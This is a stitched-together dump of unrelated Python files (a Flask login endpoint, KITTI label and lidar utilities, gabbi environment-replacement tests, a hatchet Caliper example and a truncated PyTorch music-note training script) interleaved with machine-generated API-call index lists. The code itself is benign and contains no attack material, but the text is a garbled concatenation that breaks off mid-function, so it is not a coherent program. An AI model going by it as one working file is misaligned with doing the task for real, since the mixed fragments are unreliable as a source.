'import re\n'), ((16642, 16704), 'matplotlib.pyplot.boxplot', 'plt.boxplot', (['measurements'], {'notch': '(0)', 'sym': '"""k+"""', 'vert': '(1)', 'whis': '(1.5)'}), "(measurements, notch=0, sym='k+', vert=1, whis=1.5)\n", (16653, 16704), True, 'import matplotlib.pyplot as plt\n'), ((16731, 16809), 'matplotlib.pyplot.boxplot', 'plt.boxplot', (['measurements'], {'notch': '(0)', 'sym': '"""k+"""', 'vert': '(1)', 'whis': '(1.5)', 'bootstrap': '(1000)'}), "(measurements, notch=0, sym='k+', vert=1, whis=1.5, bootstrap=1000)\n", (16742, 16809), True, 'import matplotlib.pyplot as plt\n'), ((19192, 19218), 'numpy.equal', 'np.equal', (['dataArrays', 'None'], {}), '(dataArrays, None)\n', (19200, 19218), True, 'import numpy as np\n'), ((20287, 20296), 'matplotlib.pyplot.gcf', 'plt.gcf', ([], {}), '()\n', (20294, 20296), True, 'import matplotlib.pyplot as plt\n'), ((16592, 16620), 'matplotlib.__version__.split', 'matplotlibversion.split', (['"""."""'], {}), "('.')\n", (16615, 16620), True, 'from matplotlib import __version__ as matplotlibversion\n'), ((15676, 15702), 'math.floor', 'floor', (['(i * 256 / numValues)'], {}), '(i * 256 / numValues)\n', (15681, 15702), False, 'from math import floor\n')]
|
# -*- coding: utf-8 -*-
from flask_restful import Resource
from flask_login import login_user, login_required, current_user
from .parsers import login_parser, update_info_parser
from .managers import AuthManager, UserManager
from ..constants import Code
from ..functions import make_response
class LoginResource(Resource):
def post(self):
"""登录"""
req = login_parser.parse_args(strict=True)
username = req['username']
password = req['password']
user = AuthManager.authenticate(username, password)
if not user:
return make_response(code=Code.USERNAME_OR_PASSWORD_ERROR)
login_user(user)
return make_response()
class UserInfoResource(Resource):
@login_required
def get(self):
result = UserManager.get_info(user=current_user)
return make_response(result)
@login_required
def post(self):
req = update_info_parser.parse_args()
nickname = req['nickname']
remark = req['remark']
avatar = req['avatar']
gender = req['gender']
result = UserManager.update_info(nickname, remark, avatar, gender, user=current_user)
return make_response(code=result)
|
[
"flask_login.login_user"
] |
[((650, 666), 'flask_login.login_user', 'login_user', (['user'], {}), '(user)\n', (660, 666), False, 'from flask_login import login_user, login_required, current_user\n')]
|
import os
import numpy as np
from wavedata.tools.core import calib_utils
class ObjectLabel:
"""Object Label Class
1 type Describes the type of object: 'Car', 'Van', 'Truck',
'Pedestrian', 'Person_sitting', 'Cyclist', 'Tram',
'Misc' or 'DontCare'
1 truncated Float from 0 (non-truncated) to 1 (truncated), where
truncated refers to the object leaving image boundaries
1 occluded Integer (0,1,2,3) indicating occlusion state:
0 = fully visible, 1 = partly occluded
2 = largely occluded, 3 = unknown
1 alpha Observation angle of object, ranging [-pi..pi]
4 bbox 2D bounding box of object in the image (0-based index):
contains left, top, right, bottom pixel coordinates
3 dimensions 3D object dimensions: height, width, length (in meters)
3 location 3D object location x,y,z in camera coordinates (in meters)
1 rotation_y Rotation ry around Y-axis in camera coordinates [-pi..pi]
1 score Only for results: Float, indicating confidence in
detection, needed for p/r curves, higher is better.
"""
def __init__(self):
self.type = "" # Type of object
self.truncation = 0.
self.occlusion = 0.
self.alpha = 0.
self.x1 = 0.
self.y1 = 0.
self.x2 = 0.
self.y2 = 0.
self.h = 0.
self.w = 0.
self.l = 0.
self.t = (0., 0., 0.)
self.ry = 0.
self.score = 0.
def __eq__(self, other):
"""Compares the given object to the current ObjectLabel instance.
:param other: object to compare to this instance against
:return: True, if other and current instance is the same
"""
if not isinstance(other, ObjectLabel):
return False
if self.__dict__ != other.__dict__:
return False
else:
return True
def read_labels(label_dir, img_idx, results=False):
"""Reads in label data file from Kitti Dataset.
Returns:
obj_list -- List of instances of class ObjectLabel.
Keyword arguments:
label_dir -- directory of the label files
img_idx -- index of the image
"""
# Define the object list
obj_list = []
# Extract the list
if os.stat(label_dir + "/%06d.txt" % img_idx).st_size == 0:
return
if results:
p = np.loadtxt(label_dir + "/%06d.txt" % img_idx, delimiter=' ',
dtype=str,
usecols=np.arange(start=0, step=1, stop=16))
else:
p = np.loadtxt(label_dir + "/%06d.txt" % img_idx, delimiter=' ',
dtype=str,
usecols=np.arange(start=0, step=1, stop=15))
# Check if the output is single dimensional or multi dimensional
if len(p.shape) > 1:
label_num = p.shape[0]
else:
label_num = 1
for idx in np.arange(label_num):
obj = ObjectLabel()
if label_num > 1:
# Fill in the object list
obj.type = p[idx, 0]
obj.truncation = float(p[idx, 1])
obj.occlusion = float(p[idx, 2])
obj.alpha = float(p[idx, 3])
obj.x1 = float(p[idx, 4])
obj.y1 = float(p[idx, 5])
obj.x2 = float(p[idx, 6])
obj.y2 = float(p[idx, 7])
obj.h = float(p[idx, 8])
obj.w = float(p[idx, 9])
obj.l = float(p[idx, 10])
obj.t = (float(p[idx, 11]), float(p[idx, 12]), float(p[idx, 13]))
obj.ry = float(p[idx, 14])
if results:
obj.score = float(p[idx, 15])
else:
obj.score = 0.0
else:
# Fill in the object list
obj.type = p[0]
obj.truncation = float(p[1])
obj.occlusion = float(p[2])
obj.alpha = float(p[3])
obj.x1 = float(p[4])
obj.y1 = float(p[5])
obj.x2 = float(p[6])
obj.y2 = float(p[7])
obj.h = float(p[8])
obj.w = float(p[9])
obj.l = float(p[10])
obj.t = (float(p[11]), float(p[12]), float(p[13]))
obj.ry = float(p[14])
if results:
obj.score = float(p[15])
else:
obj.score = 0.0
obj_list.append(obj)
return obj_list
def build_bbs_from_objects(obj_list, class_needed):
""" Converts between a list of objects and a numpy array containing the
bounding boxes.
:param obj_list: an object list as per object class
:param class_needed: 'Car', 'Pedestrian' ... If no class filtering is
needed use 'All'
:return boxes_2d : a numpy array formed as a list of boxes in the form
[boxes_frame_1, ... boxes_frame_n], where boxes_frame_n is a numpy
array containing all bounding boxes in the frame n with the format:
[[x1, y1, x2, y2], [x1, y1, x2, y2]].
:return boxes_3d : a numpy array formed as a list of boxes in the form
[boxes_frame_1, ... boxes_frame_n], where boxes_frame_n is a numpy
array containing all bounding boxes in the frame n with the format:
[[ry, l, h, w, tx, ty, tz],...[ry, l, h, w, tx, ty, tz]]
:return scores : a numpy array of the form
[[scores_frame_1],
...,
[scores_frame_n]]
"""
if class_needed == 'All':
obj_detections = obj_list
else:
if isinstance(class_needed, str):
obj_detections = [detections for detections in obj_list if
detections.type == class_needed]
elif isinstance(class_needed, list):
obj_detections = [detections for detections in obj_list if
detections.type in class_needed]
else:
raise TypeError("Invalid type for class_needed, {} should be "
"str or list".format(type(class_needed)))
# Build A Numpy Array Of 2D Bounding Boxes
x1 = [obj.x1 for obj in obj_detections]
y1 = [obj.y1 for obj in obj_detections]
x2 = [obj.x2 for obj in obj_detections]
y2 = [obj.y2 for obj in obj_detections]
ry = [obj.ry for obj in obj_detections]
l = [obj.l for obj in obj_detections]
h = [obj.h for obj in obj_detections]
w = [obj.w for obj in obj_detections]
tx = [obj.t[0] for obj in obj_detections]
ty = [obj.t[1] for obj in obj_detections]
tz = [obj.t[2] for obj in obj_detections]
scores = [obj.score for obj in obj_detections]
num_objs = len(obj_detections)
boxes_2d = np.zeros((num_objs, 4))
boxes_3d = np.zeros((num_objs, 7)) # [ry, l, h, w, tx, ty, tz]
for it in range(num_objs):
boxes_2d[it] = np.array([x1[it],
y1[it],
x2[it],
y2[it]])
boxes_3d[it] = np.array([ry[it],
l[it],
h[it],
w[it],
tx[it],
ty[it],
tz[it]])
return boxes_2d, boxes_3d, scores
def get_lidar_point_cloud(img_idx, calib_dir, velo_dir,
im_size=None, min_intensity=None):
""" Calculates the lidar point cloud, and optionally returns only the
points that are projected to the image.
:param img_idx: image index
:param calib_dir: directory with calibration files
:param velo_dir: directory with velodyne files
:param im_size: (optional) 2 x 1 list containing the size of the image
to filter the point cloud [w, h]
:param min_intensity: (optional) minimum intensity required to keep a point
:return: (3, N) point_cloud in the form [[x,...][y,...][z,...]] 摄像头前的点, 以及图像范围内的点
"""
# Read calibration info
frame_calib = calib_utils.read_calibration(calib_dir, img_idx)
x, y, z, i = calib_utils.read_lidar(velo_dir=velo_dir, img_idx=img_idx)
# Calculate the point cloud
pts = np.vstack((x, y, z)).T
pts = calib_utils.lidar_to_cam_frame(pts, frame_calib) # 将点云坐标系转换成图像坐标系
# The given image is assumed to be a 2D image
if not im_size:
point_cloud = pts.T
return point_cloud
else:
# Only keep points in front of camera (positive z) 只保存摄像头前的点, 及z>0的点
pts = pts[pts[:, 2] > 0]
point_cloud = pts.T
# Project to image frame
point_in_im = calib_utils.project_to_image(point_cloud, p=frame_calib.p2).T # 映射到图像上
# Filter based on the given image size 保证在图像的范围内
image_filter = (point_in_im[:, 0] > 0) & \
(point_in_im[:, 0] < im_size[0]) & \
(point_in_im[:, 1] > 0) & \
(point_in_im[:, 1] < im_size[1])
if not min_intensity:
return pts[image_filter].T
else:
intensity_filter = i > min_intensity
point_filter = np.logical_and(image_filter, intensity_filter)
return pts[point_filter].T
def get_road_plane(img_idx, planes_dir):
"""Reads the road plane from file
:param int img_idx : Index of image
:param str planes_dir : directory containing plane text files
:return plane : List containing plane equation coefficients
"""
plane_file = planes_dir + '/%06d.txt' % img_idx
with open(plane_file, 'r') as input_file:
lines = input_file.readlines()
input_file.close()
# Plane coefficients stored in 4th row
lines = lines[3].split()
# Convert str to float
lines = [float(i) for i in lines]
plane = np.asarray(lines)
# Ensure normal is always facing up.
# In Kitti's frame of reference, +y is down
if plane[1] > 0:
plane = -plane
# Normalize the plane coefficients
norm = np.linalg.norm(plane[0:3])
plane = plane / norm
return plane
def compute_box_corners_3d(object_label):
"""Computes the 3D bounding box corner positions from an ObjectLabel
:param object_label: ObjectLabel to compute corners from
:return: a numpy array of 3D corners if the box is in front of the camera,
an empty array otherwise
"""
# Compute rotational matrix
rot = np.array([[+np.cos(object_label.ry), 0, +np.sin(object_label.ry)],
[0, 1, 0],
[-np.sin(object_label.ry), 0, +np.cos(object_label.ry)]])
l = object_label.l
w = object_label.w
h = object_label.h
# 3D BB corners
x_corners = np.array(
[l / 2, l / 2, -l / 2, -l / 2, l / 2, l / 2, -l / 2, -l / 2])
y_corners = np.array([0, 0, 0, 0, -h, -h, -h, -h])
z_corners = np.array(
[w / 2, -w / 2, -w / 2, w / 2, w / 2, -w / 2, -w / 2, w / 2])
corners_3d = np.dot(rot, np.array([x_corners, y_corners, z_corners]))
corners_3d[0, :] = corners_3d[0, :] + object_label.t[0]
corners_3d[1, :] = corners_3d[1, :] + object_label.t[1]
corners_3d[2, :] = corners_3d[2, :] + object_label.t[2]
return corners_3d
def project_box3d_to_image(corners_3d, p):
"""Computes the 3D bounding box projected onto
image space.
Keyword arguments:
obj -- object file to draw bounding box
p -- transform matrix
Returns:
corners : numpy array of corner points projected
onto image space.
face_idx: numpy array of 3D bounding box face
"""
# index for 3d bounding box face
# it is converted to 4x4 matrix
face_idx = np.array([0, 1, 5, 4, # front face
1, 2, 6, 5, # left face
2, 3, 7, 6, # back face
3, 0, 4, 7]).reshape((4, 4)) # right face
return calib_utils.project_to_image(corners_3d, p), face_idx
def compute_orientation_3d(obj, p):
"""Computes the orientation given object and camera matrix
Keyword arguments:
obj -- object file to draw bounding box
p -- transform matrix
"""
# compute rotational matrix
rot = np.array([[+np.cos(obj.ry), 0, +np.sin(obj.ry)],
[0, 1, 0],
[-np.sin(obj.ry), 0, +np.cos(obj.ry)]])
orientation3d = np.array([0.0, obj.l, 0.0, 0.0, 0.0, 0.0]).reshape(3, 2)
orientation3d = np.dot(rot, orientation3d)
orientation3d[0, :] = orientation3d[0, :] + obj.t[0]
orientation3d[1, :] = orientation3d[1, :] + obj.t[1]
orientation3d[2, :] = orientation3d[2, :] + obj.t[2]
# only draw for boxes that are in front of the camera
for idx in np.arange(orientation3d.shape[1]):
if orientation3d[2, idx] < 0.1:
return None
return calib_utils.project_to_image(orientation3d, p)
def is_point_inside(points, box_corners):
"""Check if each point in a 3D point cloud lies within the 3D bounding box
If we think of the bounding box as having bottom face
defined by [P1, P2, P3, P4] and top face [P5, P6, P7, P8]
then there are three directions on a perpendicular edge:
u = P1 - P2
v = P1 - P4
w = P1 - P5
A point x lies within the box when the following constraints
are respected:
- The dot product u.x is between u.P1 and u.P2
- The dot product v.x is between v.P1 and v.P4
- The dot product w.x is between w.P1 and w.P5
:param points: (3, N) point cloud to test in the form
[[x1...xn], [y1...yn], [z1...zn]]
:param box_corners: 3D corners of the bounding box
:return bool mask of which points are within the bounding box.
Use numpy function .all() to check all points
"""
p1 = box_corners[:, 0]
p2 = box_corners[:, 1]
p4 = box_corners[:, 3]
p5 = box_corners[:, 4]
u = p2 - p1
v = p4 - p1
w = p5 - p1
# if u.P1 < u.x < u.P2
u_dot_x = np.dot(u, points)
u_dot_p1 = np.dot(u, p1)
u_dot_p2 = np.dot(u, p2)
# if v.P1 < v.x < v.P4
v_dot_x = np.dot(v, points)
v_dot_p1 = np.dot(v, p1)
v_dot_p2 = np.dot(v, p4)
# if w.P1 < w.x < w.P5
w_dot_x = np.dot(w, points)
w_dot_p1 = np.dot(w, p1)
w_dot_p2 = np.dot(w, p5)
point_mask = (u_dot_p1 < u_dot_x) & (u_dot_x < u_dot_p2) & \
(v_dot_p1 < v_dot_x) & (v_dot_x < v_dot_p2) & \
(w_dot_p1 < w_dot_x) & (w_dot_x < w_dot_p2)
return point_mask
def get_point_filter(point_cloud, extents, ground_plane=None, offset_dist=2.0):
"""
Creates a point filter using the 3D extents and ground plane
:param point_cloud: Point cloud in the form [[x,...],[y,...],[z,...]]
:param extents: 3D area in the form
[[min_x, max_x], [min_y, max_y], [min_z, max_z]]
:param ground_plane: Optional, coefficients of the ground plane
(a, b, c, d)
:param offset_dist: If ground_plane is provided, removes points above
this offset from the ground_plane
:return: A binary mask for points within the extents and offset plane
"""
point_cloud = np.asarray(point_cloud)
# Filter points within certain xyz range
x_extents = extents[0]
y_extents = extents[1]
z_extents = extents[2]
extents_filter = (point_cloud[0] > x_extents[0]) & \
(point_cloud[0] < x_extents[1]) & \
(point_cloud[1] > y_extents[0]) & \
(point_cloud[1] < y_extents[1]) & \
(point_cloud[2] > z_extents[0]) & \
(point_cloud[2] < z_extents[1])
if ground_plane is not None:
ground_plane = np.array(ground_plane)
# Calculate filter using ground plane
ones_col = np.ones(point_cloud.shape[1])
padded_points = np.vstack([point_cloud, ones_col])
offset_plane = ground_plane + [0, 0, 0, -offset_dist]
# Create plane filter
dot_prod = np.dot(offset_plane, padded_points)
plane_filter = dot_prod < 0
# Combine the two filters
point_filter = np.logical_and(extents_filter, plane_filter)
else:
# Only use the extents for filtering
point_filter = extents_filter
return point_filter
|
[
"wavedata.tools.core.calib_utils.project_to_image",
"wavedata.tools.core.calib_utils.read_calibration",
"numpy.logical_and",
"os.stat",
"numpy.asarray",
"numpy.zeros",
"numpy.ones",
"numpy.sin",
"wavedata.tools.core.calib_utils.lidar_to_cam_frame",
"numpy.arange",
"wavedata.tools.core.calib_utils.read_lidar",
"numpy.linalg.norm",
"numpy.array",
"numpy.dot",
"numpy.cos",
"numpy.vstack"
] |
[((3056, 3076), 'numpy.arange', 'np.arange', (['label_num'], {}), '(label_num)\n', (3065, 3076), True, 'import numpy as np\n'), ((6754, 6777), 'numpy.zeros', 'np.zeros', (['(num_objs, 4)'], {}), '((num_objs, 4))\n', (6762, 6777), True, 'import numpy as np\n'), ((6793, 6816), 'numpy.zeros', 'np.zeros', (['(num_objs, 7)'], {}), '((num_objs, 7))\n', (6801, 6816), True, 'import numpy as np\n'), ((8098, 8146), 'wavedata.tools.core.calib_utils.read_calibration', 'calib_utils.read_calibration', (['calib_dir', 'img_idx'], {}), '(calib_dir, img_idx)\n', (8126, 8146), False, 'from wavedata.tools.core import calib_utils\n'), ((8164, 8222), 'wavedata.tools.core.calib_utils.read_lidar', 'calib_utils.read_lidar', ([], {'velo_dir': 'velo_dir', 'img_idx': 'img_idx'}), '(velo_dir=velo_dir, img_idx=img_idx)\n', (8186, 8222), False, 'from wavedata.tools.core import calib_utils\n'), ((8299, 8347), 'wavedata.tools.core.calib_utils.lidar_to_cam_frame', 'calib_utils.lidar_to_cam_frame', (['pts', 'frame_calib'], {}), '(pts, frame_calib)\n', (8329, 8347), False, 'from wavedata.tools.core import calib_utils\n'), ((9857, 9874), 'numpy.asarray', 'np.asarray', (['lines'], {}), '(lines)\n', (9867, 9874), True, 'import numpy as np\n'), ((10060, 10086), 'numpy.linalg.norm', 'np.linalg.norm', (['plane[0:3]'], {}), '(plane[0:3])\n', (10074, 10086), True, 'import numpy as np\n'), ((10760, 10830), 'numpy.array', 'np.array', (['[l / 2, l / 2, -l / 2, -l / 2, l / 2, l / 2, -l / 2, -l / 2]'], {}), '([l / 2, l / 2, -l / 2, -l / 2, l / 2, l / 2, -l / 2, -l / 2])\n', (10768, 10830), True, 'import numpy as np\n'), ((10856, 10894), 'numpy.array', 'np.array', (['[0, 0, 0, 0, -h, -h, -h, -h]'], {}), '([0, 0, 0, 0, -h, -h, -h, -h])\n', (10864, 10894), True, 'import numpy as np\n'), ((10911, 10981), 'numpy.array', 'np.array', (['[w / 2, -w / 2, -w / 2, w / 2, w / 2, -w / 2, -w / 2, w / 2]'], {}), '([w / 2, -w / 2, -w / 2, w / 2, w / 2, -w / 2, -w / 2, w / 2])\n', (10919, 10981), True, 'import numpy as np\n'), ((12477, 12503), 'numpy.dot', 'np.dot', (['rot', 'orientation3d'], {}), '(rot, orientation3d)\n', (12483, 12503), True, 'import numpy as np\n'), ((12750, 12783), 'numpy.arange', 'np.arange', (['orientation3d.shape[1]'], {}), '(orientation3d.shape[1])\n', (12759, 12783), True, 'import numpy as np\n'), ((12861, 12907), 'wavedata.tools.core.calib_utils.project_to_image', 'calib_utils.project_to_image', (['orientation3d', 'p'], {}), '(orientation3d, p)\n', (12889, 12907), False, 'from wavedata.tools.core import calib_utils\n'), ((14013, 14030), 'numpy.dot', 'np.dot', (['u', 'points'], {}), '(u, points)\n', (14019, 14030), True, 'import numpy as np\n'), ((14046, 14059), 'numpy.dot', 'np.dot', (['u', 'p1'], {}), '(u, p1)\n', (14052, 14059), True, 'import numpy as np\n'), ((14075, 14088), 'numpy.dot', 'np.dot', (['u', 'p2'], {}), '(u, p2)\n', (14081, 14088), True, 'import numpy as np\n'), ((14131, 14148), 'numpy.dot', 'np.dot', (['v', 'points'], {}), '(v, points)\n', (14137, 14148), True, 'import numpy as np\n'), ((14164, 14177), 'numpy.dot', 'np.dot', (['v', 'p1'], {}), '(v, p1)\n', (14170, 14177), True, 'import numpy as np\n'), ((14193, 14206), 'numpy.dot', 'np.dot', (['v', 'p4'], {}), '(v, p4)\n', (14199, 14206), True, 'import numpy as np\n'), ((14249, 14266), 'numpy.dot', 'np.dot', (['w', 'points'], {}), '(w, points)\n', (14255, 14266), True, 'import numpy as np\n'), ((14282, 14295), 'numpy.dot', 'np.dot', (['w', 'p1'], {}), '(w, p1)\n', (14288, 14295), True, 'import numpy as np\n'), ((14311, 14324), 'numpy.dot', 'np.dot', (['w', 'p5'], {}), '(w, p5)\n', (14317, 14324), True, 'import numpy as np\n'), ((15173, 15196), 'numpy.asarray', 'np.asarray', (['point_cloud'], {}), '(point_cloud)\n', (15183, 15196), True, 'import numpy as np\n'), ((6901, 6943), 'numpy.array', 'np.array', (['[x1[it], y1[it], x2[it], y2[it]]'], {}), '([x1[it], y1[it], x2[it], y2[it]])\n', (6909, 6943), True, 'import numpy as np\n'), ((7067, 7130), 'numpy.array', 'np.array', (['[ry[it], l[it], h[it], w[it], tx[it], ty[it], tz[it]]'], {}), '([ry[it], l[it], h[it], w[it], tx[it], ty[it], tz[it]])\n', (7075, 7130), True, 'import numpy as np\n'), ((8266, 8286), 'numpy.vstack', 'np.vstack', (['(x, y, z)'], {}), '((x, y, z))\n', (8275, 8286), True, 'import numpy as np\n'), ((9196, 9242), 'numpy.logical_and', 'np.logical_and', (['image_filter', 'intensity_filter'], {}), '(image_filter, intensity_filter)\n', (9210, 9242), True, 'import numpy as np\n'), ((11021, 11064), 'numpy.array', 'np.array', (['[x_corners, y_corners, z_corners]'], {}), '([x_corners, y_corners, z_corners])\n', (11029, 11064), True, 'import numpy as np\n'), ((11939, 11982), 'wavedata.tools.core.calib_utils.project_to_image', 'calib_utils.project_to_image', (['corners_3d', 'p'], {}), '(corners_3d, p)\n', (11967, 11982), False, 'from wavedata.tools.core import calib_utils\n'), ((15720, 15742), 'numpy.array', 'np.array', (['ground_plane'], {}), '(ground_plane)\n', (15728, 15742), True, 'import numpy as np\n'), ((15809, 15838), 'numpy.ones', 'np.ones', (['point_cloud.shape[1]'], {}), '(point_cloud.shape[1])\n', (15816, 15838), True, 'import numpy as np\n'), ((15863, 15897), 'numpy.vstack', 'np.vstack', (['[point_cloud, ones_col]'], {}), '([point_cloud, ones_col])\n', (15872, 15897), True, 'import numpy as np\n'), ((16011, 16046), 'numpy.dot', 'np.dot', (['offset_plane', 'padded_points'], {}), '(offset_plane, padded_points)\n', (16017, 16046), True, 'import numpy as np\n'), ((16141, 16185), 'numpy.logical_and', 'np.logical_and', (['extents_filter', 'plane_filter'], {}), '(extents_filter, plane_filter)\n', (16155, 16185), True, 'import numpy as np\n'), ((2433, 2475), 'os.stat', 'os.stat', (["(label_dir + '/%06d.txt' % img_idx)"], {}), "(label_dir + '/%06d.txt' % img_idx)\n", (2440, 2475), False, 'import os\n'), ((8701, 8760), 'wavedata.tools.core.calib_utils.project_to_image', 'calib_utils.project_to_image', (['point_cloud'], {'p': 'frame_calib.p2'}), '(point_cloud, p=frame_calib.p2)\n', (8729, 8760), False, 'from wavedata.tools.core import calib_utils\n'), ((11724, 11782), 'numpy.array', 'np.array', (['[0, 1, 5, 4, 1, 2, 6, 5, 2, 3, 7, 6, 3, 0, 4, 7]'], {}), '([0, 1, 5, 4, 1, 2, 6, 5, 2, 3, 7, 6, 3, 0, 4, 7])\n', (11732, 11782), True, 'import numpy as np\n'), ((12400, 12442), 'numpy.array', 'np.array', (['[0.0, obj.l, 0.0, 0.0, 0.0, 0.0]'], {}), '([0.0, obj.l, 0.0, 0.0, 0.0, 0.0])\n', (12408, 12442), True, 'import numpy as np\n'), ((2660, 2695), 'numpy.arange', 'np.arange', ([], {'start': '(0)', 'step': '(1)', 'stop': '(16)'}), '(start=0, step=1, stop=16)\n', (2669, 2695), True, 'import numpy as np\n'), ((2845, 2880), 'numpy.arange', 'np.arange', ([], {'start': '(0)', 'step': '(1)', 'stop': '(15)'}), '(start=0, step=1, stop=15)\n', (2854, 2880), True, 'import numpy as np\n'), ((10489, 10512), 'numpy.cos', 'np.cos', (['object_label.ry'], {}), '(object_label.ry)\n', (10495, 10512), True, 'import numpy as np\n'), ((10518, 10541), 'numpy.sin', 'np.sin', (['object_label.ry'], {}), '(object_label.ry)\n', (10524, 10541), True, 'import numpy as np\n'), ((10597, 10620), 'numpy.sin', 'np.sin', (['object_label.ry'], {}), '(object_label.ry)\n', (10603, 10620), True, 'import numpy as np\n'), ((10626, 10649), 'numpy.cos', 'np.cos', (['object_label.ry'], {}), '(object_label.ry)\n', (10632, 10649), True, 'import numpy as np\n'), ((12251, 12265), 'numpy.cos', 'np.cos', (['obj.ry'], {}), '(obj.ry)\n', (12257, 12265), True, 'import numpy as np\n'), ((12271, 12285), 'numpy.sin', 'np.sin', (['obj.ry'], {}), '(obj.ry)\n', (12277, 12285), True, 'import numpy as np\n'), ((12341, 12355), 'numpy.sin', 'np.sin', (['obj.ry'], {}), '(obj.ry)\n', (12347, 12355), True, 'import numpy as np\n'), ((12361, 12375), 'numpy.cos', 'np.cos', (['obj.ry'], {}), '(obj.ry)\n', (12367, 12375), True, 'import numpy as np\n')]
|
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""A place to put test of the replacers.
"""
import os
import unittest
from gabbi import case
from gabbi import exception
class EnvironReplaceTest(unittest.TestCase):
def test_environ_boolean(self):
"""Environment variables are always strings
That doesn't always suit our purposes, so test that "True"
and "False" become booleans as a special case.
"""
http_case = case.HTTPTestCase('test_request')
message = "$ENVIRON['moo']"
os.environ['moo'] = "True"
self.assertEqual(True, http_case._environ_replace(message))
os.environ['moo'] = "False"
self.assertEqual(False, http_case._environ_replace(message))
os.environ['moo'] = "true"
self.assertEqual(True, http_case._environ_replace(message))
os.environ['moo'] = "faLse"
self.assertEqual(False, http_case._environ_replace(message))
os.environ['moo'] = "null"
self.assertEqual(None, http_case._environ_replace(message))
os.environ['moo'] = "1"
self.assertEqual(1, http_case._environ_replace(message))
os.environ['moo'] = "cow"
self.assertEqual("cow", http_case._environ_replace(message))
message = '$ENVIRON["moo"]'
os.environ['moo'] = "True"
self.assertEqual(True, http_case._environ_replace(message))
class TestReplaceHeaders(unittest.TestCase):
def test_empty_headers(self):
"""A None value in headers should cause a GabbiFormatError."""
http_case = case.HTTPTestCase('test_request')
self.assertRaises(
exception.GabbiFormatError,
http_case._replace_headers_template, 'foo', None)
|
[
"gabbi.case.HTTPTestCase"
] |
[((963, 996), 'gabbi.case.HTTPTestCase', 'case.HTTPTestCase', (['"""test_request"""'], {}), "('test_request')\n", (980, 996), False, 'from gabbi import case\n'), ((2073, 2106), 'gabbi.case.HTTPTestCase', 'case.HTTPTestCase', (['"""test_request"""'], {}), "('test_request')\n", (2090, 2106), False, 'from gabbi import case\n')]
|
#!/usr/bin/env python
import hatchet as ht
if __name__ == "__main__":
# Path to caliper json-split file.
json_file = "../../../hatchet/tests/data/caliper-cpi-json/cpi-callpath-profile.json"
# Use hatchet's ``from_caliper_json`` API with the resulting json-split.
# The result is stored into Hatchet's GraphFrame.
gf = ht.GraphFrame.from_caliper_json(json_file)
# Printout the DataFrame component of the GraphFrame.
print(gf.dataframe)
# Printout the graph component of the GraphFrame.
# Because no metric parameter is specified, ``time`` is used by default.
print(gf.tree())
|
[
"hatchet.GraphFrame.from_caliper_json"
] |
[((342, 384), 'hatchet.GraphFrame.from_caliper_json', 'ht.GraphFrame.from_caliper_json', (['json_file'], {}), '(json_file)\n', (373, 384), True, 'import hatchet as ht\n')]
|
from options import opt
import os
from pathlib import Path
import json
import numpy as np
from dataset import NoteDataset, get_loader
import torch
from model import Rnn, BiRNN, NeuralNet, NeuralNetWithRNN
import torch.nn as nn
import copy
from tqdm import tqdm
from torch.optim.lr_scheduler import ReduceLROnPlateau
from visual import visualization
def preprocess(data_seq, label):
new_label=[]
for i in range(len(label)):
label_of_one_song = []
cur_note = 0
cur_note_onset = label[i][cur_note][0]
cur_note_offset = label[i][cur_note][1]
cur_note_pitch = label[i][cur_note][2]
for j in range(len(data_seq[i])):
cur_time = j * 0.032 + 0.016
if abs(cur_time - cur_note_onset) < 0.017:
label_of_one_song.append(np.array([1, 0, cur_note_pitch]))
elif cur_time < cur_note_onset or cur_note >= len(label[i]):
label_of_one_song.append(np.array([0, 0, 0.0]))
elif abs(cur_time - cur_note_offset) < 0.017:
label_of_one_song.append(np.array([0, 1, cur_note_pitch]))
cur_note = cur_note + 1
if cur_note < len(label[i]):
cur_note_onset = label[i][cur_note][0]
cur_note_offset = label[i][cur_note][1]
cur_note_pitch = label[i][cur_note][2]
else:
label_of_one_song.append(np.array([0, 0, cur_note_pitch]))
new_label.append(label_of_one_song)
return new_label
def train():
data_set = NoteDataset(data_seq, label)
train_loader, valid_loader = get_loader(data_set)
# model = Rnn(opt.input_dim, opt.hidden_size)
# model = BiRNN(opt.input_dim, opt.hidden_size, opt.num_layers)
# model=NeuralNet(opt.input_dim,[34,51,34,17])
model=NeuralNetWithRNN(opt.input_dim,[34,51,34,17])
model = model.cuda(opt.cuda_devices)
best_model_params = copy.deepcopy(model.state_dict())
best_loss = float('inf')
training_loss_list = []
valid_loss_list = []
criterion_onset = nn.BCEWithLogitsLoss()
criterion_pitch = nn.SmoothL1Loss()
optimizer = torch.optim.Adam(model.parameters(), lr=opt.lr)
scheduler = ReduceLROnPlateau(optimizer, mode='min', factor=0.5, patience=2, verbose=True, min_lr=1e-8)
record = open('record.txt', 'w')
for epoch in range(opt.epochs):
print(f'Epoch: {epoch + 1}/{opt.epochs}')
print('-' * len(f'Epoch: {epoch + 1}/{opt.epochs}'))
training_loss = 0.0
valid_loss = 0.0
total_length=0.0
model.train()
for i, sample in enumerate(tqdm(train_loader)):
inputs = sample['data']
inputs = torch.FloatTensor(inputs)
inputs = inputs.permute(1, 0, 2)
inputs = inputs.cuda(opt.cuda_devices)
target = sample['label']
target = torch.FloatTensor(target)
target = target.permute(1, 0, 2)
target = target.cuda(opt.cuda_devices)
inputs_length = list(inputs.shape)[0]
optimizer.zero_grad()
output1, output2 = model(inputs)
onset_loss = criterion_onset(output1, torch.narrow(target, dim=2, start=0, length=2))
pitch_loss = criterion_pitch(output2, torch.narrow(target, dim=2, start=2, length=1))
total_loss = onset_loss + pitch_loss
training_loss = training_loss + total_loss.item()
total_length += 1
total_loss.backward()
optimizer.step()
training_loss /= total_length
training_loss_list.append(training_loss)
print(f'training_loss: {training_loss:.4f}')
model.eval()
total_length = 0
for i, sample in enumerate(tqdm(valid_loader)):
inputs = sample['data']
inputs = torch.FloatTensor(inputs)
inputs = inputs.permute(1, 0, 2)
inputs = inputs.cuda(opt.cuda_devices)
target = sample['label']
target = torch.FloatTensor(target)
target = target.permute(1, 0, 2)
target = target.cuda(opt.cuda_devices)
inputs_length = list(inputs.shape)[0]
optimizer.zero_grad()
output1, output2 = model(inputs)
